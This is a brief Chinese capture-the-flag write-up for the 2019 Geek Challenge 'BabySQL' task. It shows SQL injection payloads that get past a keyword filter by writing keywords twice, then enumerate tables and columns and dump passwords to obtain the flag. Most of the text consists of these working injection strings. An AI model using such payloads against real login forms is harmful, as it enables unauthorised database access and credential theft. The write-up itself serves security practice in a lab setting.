极客大挑战-2019-BabySQL
[极客大挑战 2019]BabySQL
1.题目:
2.过程:
sql注入,含有一些过滤,测试一下:
or被换掉了,应该可以双写绕过。#应该也被过滤了,本来想试试双写%23,但是%23好像就可以
?username=1&password=1’ oorr 1=1%23
?username=1&password=1’ ununionion selselectect 1,(selselectect group_concat(table_name) frofromm infoorrmation_schema.tables whwhereere table_schema=database()),3%23
?username=1&password=1’ ununionion selselectect 1,(selselectect group_concat(column_name) frofromm infoorrmation_schema.columns whwhereere table_name=’b4bsql’),3%23
这个or的替换真是处处可见……
?username=1&password=1’ ununionion selselectect 1,(selselectect group_concat(passwoorrd) frofromm b4bsql),3%23
flag{539ec27d-80a6-4381-a837-805f1b9b406e}
得到flag……
极客大挑战-2019-BabySQL